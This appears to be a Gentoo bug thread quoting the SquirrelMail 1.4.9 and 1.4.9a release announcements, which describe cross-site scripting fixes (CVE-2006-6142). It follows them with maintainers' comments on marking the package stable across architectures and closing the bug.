From: kink@squirrelmail.org Subject: [SM-ANNOUNCE] SquirrelMail 1.4.9 Released Date: December 2, 2006 10:48:45 AM EST To: squirrelmail-announce@lists.sourceforge.net Cc: squirrelmail-plugins@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-devel@lists.sourceforge.net Hello All, The SquirrelMail Project Team is proud to announce the release of SquirrelMail 1.4.7. This version is a maintenance release, addressing the following problems since 1.4.6: - Some security fixes (see below) - Small enhancements - A collection of bugfixes (see ChangeLog) Security issues =============== This release addresses security issues found since the release of 1.4.8: Cross site scripting via malicious input the mailto parameter of webmail.php, the session and delete_draft parameters of compose.php and via a shortcoming in the magicHTML filter. This is CVE-2006-6142. Thanks for Martijn Brinkers for his continued research that uncovered these issues. We've also changed SquirrelMail attachment handling to work around an issue in Internet Explorer: the browser will attempt to guess the MIME type of attachments based on content, not the MIME header we send. Attachments could fake to be an 'harmless' image/jpeg, while they were in fact HTML that Internet Explorer would render. Further details on SquirrelMail vulnerabilities can be found at the following address: http://www.squirrelmail.org/security/ We strongly encourage any persons uncovering security issues to contact the SquirrelMail team via security <at> squirrelmail.org. Package md5sums =============== b3dc6e3c5accb9b88bf6ebfd87336b96 squirrelmail-1.4.9.tar.bz2 5a3ecbda6d8378c68fa40b4ac5b2d487 squirrelmail-1.4.9.tar.gz 875848f25d481b59552d4e93aaacba4c squirrelmail-1.4.9.zip Download at: http://www.squirrelmail.org/download.php Happy SquirrelMailing! -- Thijs Kinkhorst SquirrelMail Project Team
thanks for filing this, eraidcator please provide new packages blablaa (guess you already know that ;)
From: marc@squirrelmail.org Subject: [SM-ANNOUNCE] SquirrelMail 1.4.9a Released Date: December 3, 2006 8:25:21 PM EST To: squirrelmail-announce@lists.sourceforge.net Cc: squirrelmail-devel@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-plugins@lists.sourceforge.net Hello All, The SquirrelMail Project Team is proud to announce the release of SquirrelMail 1.4.9a. This version is a security release. The day after we released SquirrelMail 1.4.9 new cross site scripting issues were reported and immediately fixed. Therefor the decision to release 1.4.9a so short after the 1.4.9 release. 1.4.9 and 1.4.9a is addressing the following problems since 1.4.8: - Some security fixes (see below) - Small enhancements - A collection of bugfixes (see ChangeLog) Security issues =============== This release addresses security issues found since the release of 1.4.8: Cross site scripting via malicious input the mailto parameter of webmail.php, the session and delete_draft parameters of compose.php and via a shortcoming in the magicHTML filter. This is CVE-2006-6142. Thanks for Martijn Brinkers for his continued research that uncovered these issues. We've also changed SquirrelMail attachment handling to work around an issue in Internet Explorer: the browser will attempt to guess the MIME type of attachments based on content, not the MIME header we send. Attachments could fake to be an 'harmless' image/jpeg, while they were in fact HTML that Internet Explorer would render. After release 1.4.9 Martijn Brinkers again discovered new cross site scripting issues in the magicHtml filter. The new discovered security issues have to do with the wide intepretation of the words expression and url by IE browsers. As second issue Martijn Brinkers that the @import statement in stylesheets could be misused. Further details on SquirrelMail vulnerabilities can be found at the following address: http://www.squirrelmail.org/security/ Package md5sums =============== 3adf66bfe2e816ba8375cf811d8ef3f6 squirrelmail-1.4.9a.tar.bz2 5b19f8cc5badef91d1f2410df41564bc squirrelmail-1.4.9a.tar.gz a9e108418b0a42763a1d29a267fa7168 squirrelmail-1.4.9a.zip Download at: http://www.squirrelmail.org/download.php Happy SquirrelMailing! -- Marc Groot Koerkamp SquirrelMail Project Team
As Jeremy is still MIA, I took the liberty of bumping squirrelmail to 1.4.9a. I have also marked it stable on x86, as I only tested it on a stable box, where I have a working squirrelmail installation.
Arches, test and mark mail-client/squirrelmail-1.4.9a stable if possible please
x86 and sparc already done. Removing.
ppc stable
Stable on Alpha.
ppc64 stable
amd64 stable
I vote no
i'm actually the only active member of the security team, so let's close this without GLSA. Feel free to reopen if you disagree.
This was marked as closed but was never fixed for ~arch. 1.5.1-r4 contains the fix.